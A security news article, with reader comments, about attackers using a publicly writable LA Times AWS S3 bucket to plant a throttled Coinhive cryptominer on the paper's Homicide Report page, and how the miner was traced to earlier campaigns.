Cryptojackers have been discovered sneaking mining code on to a big brand’s website through the back door of a poorly secured Amazon AWS (Amazon Web Service) S3 bucket.
Researchers at the Bad Packets Report said they noticed last week that The Homicide Report, an interactive map of city murders offered by the LA Times, was running a Coinhive Monero miner.
Present since at least February 9, the mining was throttled to run at a CPU level of under 30% in the hope this would allow it to go unnoticed for longer.
Ironically, what led researchers to the miner was its presence on an LA Times’s AWS S3 bucket – left in an unsecured state with public write permissions turned on – and not what was happening on the site itself.
Researchers even found a message suggesting someone else had discovered the open access before either Bad Packets Report or the cryptojackers. This read:
Hello, this is a friendly warning that your Amazon AWS S3 bucket settings are wrong. Anyone can write to this bucket. Please fix this before a bad guy finds it.
Unfortunately, the message went unread or unheeded and the bad guys did find out. The bucket and website were eventually cleaned by the LA Times after researchers gave them the bad news.
The incident bears a passing resemblance to the recent cryptojacking attack on an AWS S3 bucket belonging to Tesla, although without a website being involved. In that incident, the root cause was that admins forgot to set a bucket password.
The interesting follow-up is how easily incidents can be connected to the bad actors behind them.
According to the researchers, the Coinhive site key used in this attack was the same one used two weeks ago to plant miners on thousands of websites, including government sites such as the American court system (uscourts.gov) and the UK Student Loans Company.
Coinhive reportedly terminated this account but Bad Packets alleges it was used to earn the attackers the grand sum of $24 (£17) from the time it was hiding on the LA Times site.
That doesn’t sound like a lot for up to two weeks on a big website, but this was only one page. Get the same script on to hundreds or thousands of sites for any length of time and it’s not hard to see how this business model could be lucrative.
It’s a phenomenon being driven by the mania for virtual currencies, helped along by the simplicity of the earn-as-you-go business models promoted by cryptomining services.
What damage did this do?
From user’s point of view, not much. As long as miners are just stealing CPU time, they are a nuisance that can be stopped by shutting down the browser.
Still, what starts as a parasitic attack could, with easy access to cloud buckets and websites, quickly turn into something much more dangerous in the blink of an eye. The worry is that it there appears to be no shortage of cloud targets to rummage for.
6 comments on “Unsecured AWS led to cryptojacking attack on LA Times”
I have an interesting thought on this and all the other crytomining hijacks going on:
The people who wrote the mining software almost certainly protected it with a license agreement. Now, among other things, this agreement almost certainly included a line such as “… this software is licensed, not sold …”. It also formally declares who the true owners are (the company that wrote it).
Doesn’t that legally make them responsible for what the software is used for, when used as intended? So, the Times might very well have a lawsuit against the creators of the software.
Good luck contacting them…
Coinhive has a Twitter account now. Otherwise you’ll never find them. No names, no company registration, and no physical address have ever been provided.
I wonder why any companies – notably in North America and the EU – are comfortable giving 30% of anything to a faceless group like that.
Here’s a thing: if it comes out in the future that the money was going to, say, North Korea or so-called Islamic State (this is a thought exercise, not an accusation!)…
…could companies that had knowingly used the services in the past be held retrospectively liable for violating laws about trading with proscribed countries or groups?
I can’t wait till the threat actors realize they can chain attacks to make potentially more money. Start with crypto-mining on a compromised system, while stealing some data, and plant ransomware. If the crypto-mining is discovered and stopped, the bad guys can turn around an threaten release of data (doxing) they stole if they don’t allow mining to continue. If they won’t comply, sell the data, then release it at a future date, and finally let the ransomware loose on them. This would possibly create more exposure to getting caught, for the bad guys, but oh what a headache that would be to deal with from the victims point of view.
Ransomware attacks, when investigated afterwards with care, not infrequently throw up detections for other malware – notably cryptomining and credential stealers – that has been around for a while.
In some cases it’s reasonable to assume that where one crook could break in, so could another…
…but in others it’s a fair guess that the ransomware attack was a last roll of the die by the same crooks who had been in for a while.